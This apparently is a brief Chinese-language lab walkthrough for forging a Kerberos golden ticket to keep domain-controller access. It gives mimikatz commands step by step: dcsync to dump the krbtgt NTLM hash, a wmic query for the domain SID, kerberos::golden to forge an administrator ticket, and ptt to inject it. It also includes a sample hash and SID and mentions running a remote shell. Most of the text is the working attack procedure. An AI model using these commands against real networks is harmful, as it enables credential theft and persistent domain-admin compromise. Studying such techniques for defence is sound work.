• 伪造黄金票据是域控制器权限维持的一种方式
票据传送实验
准备
1、完整的域名称
2、krbtgt账户的NTLM Hash 或者 AES-256
3、域的sid
4、需要伪造的域管理员用户名
获取krbtgt账户的NTLM Hash
7f7ba402638eb2f6fa96dd72f656d53e
在域控的mimikatz 中运行:
lsadump::dcsync /domain:域名称 /user:krbtgt
获取NTLM Hash
获取域sid
wmic useraccount get name,sid
域sid
域sid:S-1-5-21-148781454-1908209042-142103015
伪造黄金票据
kerberos::golden /admin:administrator /domain:域名称 /sid:域sid /krbtgt:krbtgt账户的NTLM Hash /ticket:xxx.kiribi
伪造黄金票据
票据注入内存
• 清空票据:kerberos::purge
• 导入票据:kerberos::ptt administrator.kiribi
导入票据、清空票据
• 查看票据cmd中运行:
klist
查看票据
验证权限
查看远程文件
执行shell